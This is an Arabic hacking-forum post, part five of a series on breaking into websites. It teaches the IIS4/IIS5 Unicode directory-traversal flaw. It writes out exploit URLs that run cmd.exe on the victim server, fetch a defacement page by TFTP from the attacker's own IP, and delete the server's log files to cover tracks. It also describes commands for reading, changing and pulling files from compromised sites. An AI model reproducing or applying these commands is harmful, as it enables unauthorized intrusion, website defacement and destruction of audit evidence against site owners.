ايجى فــــوريــــــــو
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس 25901920
ايجى فــــوريــــــــو
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس 25901920
ايجى فــــوريــــــــو
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

ايجى فــــوريــــــــو

 
الرئيسيةالعاب-برامج.الخأحدث الصورالتسجيلدخول
دخول
اسم العضو:
كلمة السر:
ادخلني بشكل آلي عند زيارتي مرة اخرى: 
:: لقد نسيت كلمة السر
التوقيت
>

المواضيع الأخيرة
» معلومات نادرة جدا عن ...ادخل وشوف
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالأربعاء نوفمبر 30, 2011 1:41 pm من طرف رجل الرعد

» بركان ايرتا الى فى اثيوبيا ثائر دائما
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس يوليو 22, 2010 11:53 pm من طرف argon

» زنجبار ارض التوابل والسلاطين
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس يوليو 22, 2010 11:47 pm من طرف argon

» كيف تعطرين شعرك بطريقة صحية وامنة
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس يوليو 22, 2010 11:45 pm من طرف argon

» صور من افريقيا
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس يوليو 22, 2010 11:44 pm من طرف argon

» الحلقة العاشرة: حقيبة من الأوزار
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس يوليو 22, 2010 2:51 pm من طرف Mr.snake

» الحلقة التاسعة: ضحك ودموع في المؤتمر الدولى
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس يوليو 22, 2010 2:36 pm من طرف Mr.snake

» يوميات رعد العبقرى الحلقة الثامنة: الصفحات القديمة
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس يوليو 22, 2010 2:08 pm من طرف Mr.snake

» الحلقة السابعة: لغز ريتا
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس يوليو 22, 2010 2:04 pm من طرف Mr.snake


 

 جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس

اذهب الى الأسفل 
كاتب الموضوعرسالة
Mr.snake
كبير الايجاويه
كبير الايجاويه
Mr.snake


عدد المساهمات : 167
تاريخ التسجيل : 19/02/2010
العمر : 28
الموقع : الكرة الارضية

جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Empty
مُساهمةموضوع: جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس   جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس Emptyالخميس مارس 18, 2010 8:06 pm

بسم الله الرحمن الرحيم
ملحوظات هامه:
--------------
ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها
index.htm
فممكن ان تكون
index.html , default.html , default.htm , default.asp
فعليك التاكد اولا من اسم الملف و لكن
index.htm
هو الافتراضي ان يكون الرئيسي
- ممكن ان يكون الملف الرئيسي في مجلد غير ال
wwwroot
لذا فلابد من البحث ...
-----------------------------------------------------------------------------------
طريقة استخدام رفع الصفحه بواسطة برنامج
TFTP

سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى
حمل برنامج ال
tftp
فهو صغير و مجاني
ضعه في ال
c:
ضع الاندكس او صفحتك المراد رفعها في ايضا ال
c:
شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex. htm
-----------------------------------------------------------------------------------
حيث
-------
tftp.exe هو البرنامج المستخدم للرفع
"i-" براميتر
y.y.y.y رقم الايبي الخاص بك
و الباقي على ما اظن لا يحتاج توضيح ..
C:inetpubwwwrootindex.htm
هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا
-----------------------------------------------------------------------------------
و اخيرا لمسح اللوق
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log
-----------------------------------------------------------------------------------
هذا تقريبا كل ما يخص سيرفرات الويندوز و ال
IIS
اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux
فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال
ftp server
فمعظم نسخ ال
ftp
لها ثغرات يمكن استغلالها.
---------------------------------------------------------------------
5 - شرح ثغرة اليونيكود وكيفية استغلالها:

اولا ثغرات اليونيكود:
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس

- تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع
IIS4.0 / IIS5.0
والذي ياتي عادة مع
NT4 / Win2k .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ
IIS4 / IIS5
يبدا ملف
CMD
بفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الاوامر المستخدمة بواسطة ملف
.CMD

الاوامر المستخدمه بواسطة ملف الـ
CMD
وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
**************************************************
**********
امر انشاء دليل جديد
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
**************************************************
**********
امر الغاء دليل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات.
**************************************************
**********
الامر المستخدم للنسخ
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
**************************************************
**********
الامر المستخدم للنقل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
**************************************************
**********
الامر المستخدم للحذف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
**************************************************
**********
الامر المستخدم لتغيير مسمى الملفات [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
**************************************************
**********
الامر المستخدم لرؤية محتويات الملف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
**************************************************
**********
الامر المستخدم للكتابة داخل أي ملف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
**************************************************
**********
الامر المستخدم لعملية سحب أي ملف
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] +c:\

وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://egy4you.mam9.com
 
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الثانى
» جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الثالث
» جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع
» جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء السادس
» جميع طرق اختراق المواقع هااااااااااااااااااااااااااااااااااام الجزء السابع

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
ايجى فــــوريــــــــو :: الهكر العام :: اساليب الهكر والاختراق-
انتقل الى: